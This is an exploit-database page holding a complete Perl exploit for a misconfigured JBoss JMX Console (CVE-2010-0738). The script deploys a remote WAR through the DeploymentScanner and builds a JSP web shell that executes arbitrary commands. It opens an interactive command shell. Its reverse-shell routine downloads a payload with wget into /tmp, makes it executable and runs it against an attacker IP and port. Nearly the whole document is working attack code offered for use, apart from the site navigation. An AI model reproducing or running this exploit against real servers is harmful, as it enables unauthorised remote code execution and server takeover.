0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JBoss, JMX Console, misconfigured DeploymentScanner
[#!/usr/bin/perl
# Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner
# Date: Oct 3 2011
# Author: y0ug <at> codsec.com
# Version:
# Tested on: Linux
# CVE : CVE-2010-0738
#
# POC against misconfigured JBoss JMX Console
# It use the addUrl method in DeploymentScanner module
#
# More information
# http://packetstormsecurity.org/files/download/105479/JBossWhitepaper.pdf
# http://poc-hack.blogspot.com/2011/02/how-to-hack-any-version-of-jboss.html
#
# You need to edit
# $url_cmd to match the war payload url
# $url_shell is your reverse shell url
# ( only if you want to use reverse_shell("ip", "port") )
#
# The JSP shell is not mine is available every where
# I add a -b param that build the war contener to do this you need java
#
# Is a fast POC coded this morning for fun so maybe it don't cover all case/version
#
# Usage:
# Build the war contener (need java)
# ./jboss -b
# Hack
# ./jboss http://www.vuln.com:8080
use strict;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use IO::Socket::SSL;
use Cwd;
# configuration section
my $url_cmd = "http://127.0.0.1/cmd.war";
my $url_shell = "http://127.0.0.1/reverse.pl";
my $debug = 0; # 1 to switch to debug
my $useragent = "'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) ".
"Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)'";
# Don't edit from here
my $installed = 0;
my $url;
my $ua = LWP::UserAgent->new;
$SIG{INT} = "sigtrap";
sub debug {
if( $debug ){
print STDERR "debug: ", @_, "\n";
}
}
sub check_url {
my $request = GET "$url/jmx-console/";
my $response = $ua->request($request);
if (!$response->is_success) {
print STDERR $response->status_line, "\n";
return -1;
}
return 0;
}
sub sigtrap {
if ( $installed ){
print " [*] Clean of $url in progress...\n";
clean_war();
}
exit 1;
}
sub find_method_index {
my $method = shift(@_);
my $request = GET "$url/jmx-console/HtmlAdaptor?" .
"action=inspectMBean&name=jboss.deployment" .
"%3Aflavor%3DURL%2Ctype%3DDeploymentScanner";
my $response = $ua->request($request);
if (!$response->is_success) {
print STDERR $response->status_line, "\n";
return -1;
}
my $page = $response->decoded_content;
# Match a certain jboss version
while ( $page =~ m{<form method="post" action="HtmlAdaptor">(.*?)</form>}sg ){
my $form = $1;
if ( $form =~ /$method/ ){
if ( $form =~ /<input type="hidden" name="methodIndex" value="(\d+)">/ ){
debug("method $method at index $1");
return $1;
}
}
}
# Match another jboss version
while ( $page =~ m{<td class='param'>$method</td>(.*?)</tr>}sg ){
my $form = $1;
if ( $form =~ /<input type='hidden' name='methodIndex' value='(\d+)'\/>/ ){
debug("method $method at index $1");
return $1;
}
}
# Match another jboss version
while ( $page =~ m{<span class='aname'>$method</span>(.*?)<table>}sg ){
my $form = $1;
if ( $form =~ /<input type="hidden" name="methodIndex" value="(\d+)" \/>/ ){
debug("method $method at index $1");
return $1;
}
}
return -1;
}
sub is_installed_war {
my $method_index = find_method_index("hasURL");
if ( $method_index < 0 ) { print "Can't find methodIndex for hasURL\n"; return -1; }
my $request = POST "$url/jmx-console/HtmlAdaptor", { action => 'invokeOp',
name => 'jboss.deployment:type=DeploymentScanner,flavor=URL',
methodIndex => "$method_index", arg0 => $url_cmd};
my $response = $ua->request($request);
if (!$response->is_success) {
print STDERR $response->status_line, "\n";
return -1;
}
my $page = $response->decoded_content;
if ( $page =~ m{<pre>(.*?)</pre>}s ){
my $ret = $1;
if ( $ret =~ /true/ ){
return 1;
}else{
return 0;
}
}else{
print STDERR "error: occured during is_installed_war regex!\n";
return -2;
}
}
sub install_war {
if (is_installed_war == 1){
print " [*] Install canceled, already installed\n";
return 1;
}
my $method_index = find_method_index("addURL");
if ( $method_index < 0 ) { print "Can't find methodIndex for addURL\n"; return -1; }
my $request = POST "$url/jmx-console/HtmlAdaptor", { action => 'invokeOp',
name => 'jboss.deployment:type=DeploymentScanner,flavor=URL',
methodIndex => "$method_index", arg0 => $url_cmd};
my $response = $ua->request($request);
if (!$response->is_success) {
print STDERR $response->status_line, "\n";
return -1;
}
my $page = $response->decoded_content;
if ( $page =~ m{<span class='OpResult'>(.*?)</span>}s ){
print " [*] ", trim($1), "\n";
return 0;
}elsif ( $page =~ m{<pre>(.*?)</pre>}s ){
print " [*] ", trim($1), "\n";
return 0;
}elsif ( $page =~ m{</table>(.*?)</body>}s ){
print " [*] ", trim($1), "\n";
return 0;
}else{
print STDERR "error: occured during install_war regex!\n";
return -1;
}
}
sub clean_war {
while(is_installed_war == 1){
if ( uninstall_war() < 0 ){
return -1;
}
}
print " [*] Clean complete\n";
return 0;
}
sub uninstall_war {
my $method_index = find_method_index("removeURL");
if ( $method_index < 0 ) { print "Can't find methodIndex for removeURL\n"; return -1; }
my $request = POST "$url/jmx-console/HtmlAdaptor", { action => 'invokeOp',
name => 'jboss.deployment:type=DeploymentScanner,flavor=URL',
methodIndex => "$method_index", arg0 => $url_cmd};
my $response = $ua->request($request);
if (!$response->is_success) {
print STDERR $response->status_line, "\n";
return -1;
}
my $page = $response->decoded_content;
if ( $page =~ m{<span class='OpResult'>(.*?)</span>}s ){
print " [*] ", trim($1), "\n";
return 0;
}elsif ( $page =~ m{<pre>(.*?)</pre>}s ){
print " [*] ", trim($1), "\n";
return 0;
}elsif ( $page =~ m{</table>(.*?)</body>}s ){
print " [*] ", trim($1), "\n";
return 0;
}else{
print STDERR "error: occured during uninstall_war regex!\n";
return -1;
}
}
sub execute {
my $cmd = shift(@_);
print '$ ' . $cmd . "\n";
my $request = POST "$url/cmd/cmd.jsp", { cmd => $cmd};
my $response = $ua->request($request);
if (!$response->is_success) {
if ( $response->code == 404 ){
print STDERR "Command war contener is not installed!\n";
}else{
print STDERR $response->status_line, "\n";
}
return -1;
}
my $page = $response->decoded_content;
my $content = $page;
if ( $content =~ m{<BR>(.*)</pre>}s ){
print trim($1) . "\n";
return 0;
}else{
print STDERR "error: occured during exec regex!\n";
return -1;
}
}
sub reverse_shell {
my ($ip, $port) = @_;
print " [*] reverse shell to $ip $port\n";
my $cmd = "wget -O /tmp/a $url_shell";
if ( execute($cmd) < 0 ){
return -1;
}
if ( execute("chmod +x /tmp/a") < 0 ){
return -1;
}
return execute("/tmp/a $ip $port");
}
sub trim($){
my $string = shift;
$string =~ s/^\s+//;
$string =~ s/\s+$//;
return $string;
}
sub setup {
print " [*] Check url $url...\n";
if ( check_url() < 0 ){
print "Url $url not available!\n";
return -1;
}
print " [*] Try to install command war contener...\n";
return install_war;
}
sub check_cmd {
my $t = 5;
for( my $i = 1; $i <= $t ; ++$i ){
my $request = GET "$url/cmd/cmd.jsp";
my $response = $ua->request($request);
if (!$response->is_success) {
if ( $response->code != 404 ){
print STDERR $response->status_line, "\n";
return 0;
}
print(" [*] check_cmd $i/$t failed\n");
}else{
print(" [*] check_cmd $i/$t ok, gogogo!\n");
return 1;
}
if ( $i < $t-1) {sleep(15); }
}
return 0;
}
sub help {
print "Help\n";
print " - Is a perl shell so you can call perl function\n";
print " > execute(\"id\") # execute the commande\n";
print " > reverse_shell(\"8.8.8.8\", \"1912\") # download your reverse shell and execute it\n";
print " > clean # remove the war contener from the server\n";
print " > check_cmd # loop until command available\n";
print " > install_war # install the war contener from url\n";
print " > exit # clean and quit\n";
print " > exitd # exit without cleaning\n";
}
sub build_war {
my $jsp_file = "cmd.jsp";
open( my $jsp_output, '>', $jsp_file ) or
die("Can't open $jsp_file : $!");
print $jsp_output <<EOF;
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
EOF
close($jsp_output);
mkdir "WEB-INF";
my $xml_file = "WEB-INF/web.xml";
open( my $xml_output, '>', $xml_file ) or
die("Can't open $xml_file : $!");
print $xml_output <<EOF;
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
EOF
close($xml_output);
system("jar cvf cmd.war WEB-INF/ $jsp_file");
unlink($xml_file);
unlink($jsp_file);
rmdir("WEB-INF");
print " [*] War contener is here ", getcwd, "/cmd.war\n";
print " [*] Upload it to your server and update script url\n";
}
sub shell {
do {
print("> ");
chop($_ = <STDIN>);
if ( $_ eq "help" ) { help(); }
if ( $_ eq "exitd" ) { exit 0; }
elsif ( $_ ne "exit" ){ eval($_); }
warn() if $@;
} while ($_ ne "exit");
}
if($#ARGV+1 != 1){
print " [*] Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner\n";
print " [*] Date: Oct 3 2011\n";
print " [*] Author: y0ug <at> codsec.com\n";
print " [*] Version: 0.1\n";
print " [*] JSP shell url $url_cmd\n\n";
print " [*] Usage:\n";
print " Build the war contener (need java)\n";
print " $0 -b\n";
print " Hack\n";
print " $0 http://www.vuln.com:8080\n\n";
exit 1;
}
if($ARGV[0] eq "-b"){
build_war;
exit 0;
}
$url = $ARGV[0];
$ua->agent($useragent);
print " [*] JSP shell url $url_cmd\n";
if ( setup() < 0 ){
print " [*] Setup failed!\n";
exit 1;
}
$installed = 1;
print " [*] Wait few minutes, times to JBoss to load the url\n";
print " [*] You can find the shell here too\n";
print " [*] $url/cmd/cmd.jsp\n";
if ( check_cmd() <= 0 ){
print " [*] ## Exploit certainly failed! ##\n";
print " [*] You can wait a little longer (run > check_cmd)\n";
}else{
print " [*] Congrats, is up!\n";
execute("id");
}
shell();
print " [*] Clean of $url in progress...\n";
clean_war();
exit(0);
# 0day.today [2024-11-16] #